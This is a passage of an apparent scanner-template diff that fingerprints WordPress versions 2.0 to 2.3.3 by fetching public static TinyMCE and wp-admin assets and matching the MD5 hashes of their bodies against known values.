"{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_delete_col.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"05582820e152a8b53d3fb3e622a0c974\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_row_after.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"f244bea608118e1b6609d1ade714ecd5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/anchor_symbol.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"5cb42865ce70a58d420786854fed4ae1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/indent.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - 
"(\"89c00ba134c89eb949411194060c135c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/menu_check.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"fce7c811d7adec70ce79ee7c4185ec47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/help.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/statusbar_resize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"1b952cd23844b834e0a307db3c803626\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/buttons.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"bc347ed84b0c8acfebf391e3716d3908\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4ad67d7e69bdc6cf5f43126479e39469\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyleft.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"7e1153a270935427f7b61c7b6c21ab8a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/browse.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"bc730549b16f827d1c04db513e34d011\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_es.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"8b9992b808d64bde50606703bf29b9e5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/insert_button_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"93699e9345172ce5eaa5876d432aaa19\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/separator.gif" + matchers: + - type: dsl + name: 
2.1 - 2.3.3 + dsl: + - "(\"9636c1e228dc5d7c58ec2722a6d9ec23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/opacity.png" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"7f1c7b1ff1f3e04828540f6ffdde46c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/button_menu.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"ed293e6a817f44328f74c0853c628e69\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"3ca9c0469bf52d46fd0b939bac08eb8d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/backcolor.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"159795ca1b1fd16f310334db6c917515\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"e6a384f19aef7c0fb2f2e0ee0bdc72e0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_de_se.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"2eafa516095a0d8b3cd03e7b8a4430f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_sel_end.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"6a4ffda436f2ffe5a56107d6c8c5a332\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tabs_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b3a2d232dd5bf5e8a829571bbec08522\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_end.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"de9e554769bc24fc7f2acefddb04e895\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_sel_bg.gif" + 
matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"9787ead6369f4cb45f69e4dea1ceaeb1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"276f3f45f0d50a533187aefa7ce6b210\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_ru.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"bbc7be374d89a1ced0441287eeba297a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/outdent.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b7249cc5a3bce3971f0b19fccac07f60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/undo.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7883b9e1f9bf0b860e77b904e1941591\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/colors.jpg" + matchers: + - type: dsl + name: 2.2.1 - 2.3.3 + dsl: + - "(\"02ae48639aa5729e6a40fb64455c32a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/unlink.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dcd93dd109c065562fe9f5d6f978a028\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"203e5139ee72c00d597e4b00ed96d84b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/code.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"158e1ad2922f59a800e27e459c71d051\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/removeformat.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"e9c387cc80f33b14447b628df1906639\" 
== md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_delete_row.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b6943c3ba64c56ea086d33b21d66004a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_fr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"027608183023f80b0c9bf663c9e81301\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifycenter.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"9cc7a9c3f4c2a697c32aaab6bb3185b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/hr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"8d92cb73437c32a0327323b538ad2214\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/color.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c8e11c751b5575025fc50b7701719f0f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_tw.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"3236a0d3fca6a4a381da0f2b2a9337e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_ru.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"843cb1b52316024629bdc6adc665b918\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/center.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"9cc7a9c3f4c2a697c32aaab6bb3185b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_col_after.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"48b353ad270b0e05d7de456cd811c420\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/visualaid.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"50cfb5ef70eadd59e78c6c833c8a5239\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/spacer.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/forecolor.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"6b4b8602d61e17fc13a8e1abd284ecd3\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"9e936f32d2bf0338d1e261d18a1532e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/right.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"94fafae0c4b30d01d034a54376acdac3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/custom_1.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"bd1f96d299847c47fd535b1b54d3a2df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyfull.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"009750822e228e10f51e746ddf8d1fec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/paste.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7bde577f9f26ffb18e522331270140f2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/full.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"009750822e228e10f51e746ddf8d1fec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/strikethrough.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"0dcca301aa909817a82d705cc9a62952\" == md5(body))" + - method: GET + 
path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/sub.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dfbcf5f590c7a7d972f2750bf3e56a72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/link.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"010306c94f6b00146d9eda296a945040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_es.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"027608183023f80b0c9bf663c9e81301\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/sup.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"cec59878503a628b343ff844f81aff1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_de_se.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"fa8d362da3c15cab263bc7eb2d192dd1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_ru.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d70c4659f516157591c2470695c6d64e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_row_before.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"0e37e4c48dcddb1123bc6140ce323694\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/copy.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"51e409b11aa51c150090697429a953ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/redo.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c2b3b80e20aa7f50ec45acb999373425\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/image.gif" + matchers: + 
- type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"a74e3cc061c26a326844ec06f65b9a1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/anchor.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7bcf9bd9100fe611646435390e1158d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cut.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c8f1a0b1cc8e32e10cdf3d38f71bf44f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c8652735e55a968a2dd24d286c89642e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/close.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"6cc9d27bdda91ad192a4326a653ba566\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/langs/en.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"4841943ffffb477d082fbf8a3937b4d3\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"890a670585bdaa592de8dcb490136d2e\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"f886e44ef37b8158c5be50bca0b72480\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"d31d6fcc58943a8c8792f1d1271be703\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_popup.css" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"66e83a9a61c15fb26106264a8c5ddea8\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"b86dfe84d14780cc3c9b35781809f046\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4618d2b44763abe1f922992bad409cd2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/colorpicker.css" + matchers: + - type: dsl + name: 2.2.1 - 2.3.3 + 
dsl: + - "(\"61140d3dc718dca29e319aa3072e6f9f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_content.css" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"577740b3c4125b3eef84905151a9f0ff\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"df0e44ab19a98d7b5324a5b83a4bf0b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_ui.css" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"16814b0e0cc2e6bbacc6c715f191bc10\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"892361760081259446f63b7a5896d626\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3eff88011ee850654648663924d58483\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/images/spellchecker.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a190764ce4e0f7a227b89a9ce267abcd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/images/wline.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c136c9f8e00718a98947a21d8adbcc56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/langs/en.js" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"391dfb5bc08361e0aaf6acc83d1b9e9c\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"76d3b8f92d5fe33102d22036864532e3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/css/spellchecker.css" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"6a3879ddf4a1422a4d297f884272b231\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"7617a08b84cb3c3c7e1b6ba3c999055c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/editor_plugin.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + 
- "(\"d84f3a83a5ea5531637c497081f61b2f\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"baa7d736a8373a4403f36839ae29e011\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/images/help.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"487b329696681dcf9ea87ec093da28ad\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4393d22c761bf437231826cd8521dcdf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/jscripts/pasteword.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"af0196506a000742794e61b964a9e98c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/jscripts/pastetext.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a94aa9143e2ba3e944e95afc7aebc108\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/selectall.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4dbdedd53f48a7df7d6c1366169d415f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/pastetext.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"84bf65d144efe912c49f848f8ab955c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/pasteword.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4126df7324911c861b159df6217a820e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a1c015c6ec40c0a355d41fceb42e5d2e\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/editor_plugin_src.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"5693ef7bb68cb84f97cfdbcb9df64d07\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3d97f94c8e7e1ad347c43b40329da025\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"f005861cf489c578796a76a7278084b3\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"b1e0027134a866f286b1e2dd314f9578\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/jscripts/mcwindows.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"f6ff4ebb7c6c53317abdb6d39c05d065\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_minimize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"db7caf5944c85fa8d1fdfe9786672e16\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_close.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dbd0ef59421094496fc06f00754cd28f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/spacer.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"221d8352905f2c38b3cb2bd191d630b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_resize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7becf074be57ca4c386dda61ec406668\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_maximize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b346e6682287174fe73f2ad522c7df22\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/css/inlinepopup.css" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"323476688c03e43d7c71f427b7d176dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/images/rtl.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"69981824e7e2d3e2bc1e431f506e509e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/images/ltr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"85865a3e9b3b3be7e67906bd3b2fc46f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"368301dad33c512083c89420d46d4740\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"72843c656a5452135613174035d9d42a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/help.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4f0e869c8bcf84c92dd7f94a80739fb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/more.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dff3bc0a01a614b601b7826415bfe4ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/page.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"ec8d1ed1b0fd137cacdda9e316ebed31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/toolbars.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"33e46a907572061c981e459ae022b40d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/more_bug.gif" + matchers: + - type: 
dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/page_bug.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/langs/en.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"bf0bb5872302fe477bc1512ea562e98b\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"1b2855b206fa83e79b040809db339eb3\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"26fdadca806efcef54b9485a8a76fd72\" == md5(body))" + - type: dsl + name: 2.0.4 - 2.0.11 + dsl: + - "(\"3fca13e910ad3f0282af47905a3ab868\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.1 + dsl: + - "(\"da5b27e2a8961d07f4900c6dc4807c75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/wordpress.css" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"327263b7922359d6456d38a3dbdb33fe\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"008e05c3702eebe1730c58ad208a8520\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"f8dfd0c4d779272785ede08c83d1cb20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a9c67a04e2d5c8f05b35256746c1547b\" == md5(body))" + - type: dsl + name: 2.0.4 - 2.0.11 + dsl: + - "(\"9acb9d10f3310515d46a592ec8722e09\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.1 + dsl: + - "(\"da427e0fb506e2e403dde16612f4f7ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-butt-left.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"729c70ab984f1078ec91398ba55e0d05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-head.gif" + matchers: + - type: dsl + name: 
2.0 - 2.3.3 + dsl: + - "(\"87f02ca247ab3a0a631a5248b1da342d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-butt-right.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"f354e52a372a936e86212c7d76eb5620\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-head-right.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"0907b7ac6a357333357a0f12c0890d41\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/login-bkg-tile.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"fb31d6fa4de06f45e077be1a53dc9975\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/heading-bg.gif" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"99159ef1b8abd8b907abcba0de48d585\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/login-bkg-bottom.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"580bb0b7fade637e26f3860b87f32e3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-bg-left.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"3bb60b3e953e96e70ebd07db595e3527\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/notice.gif" + 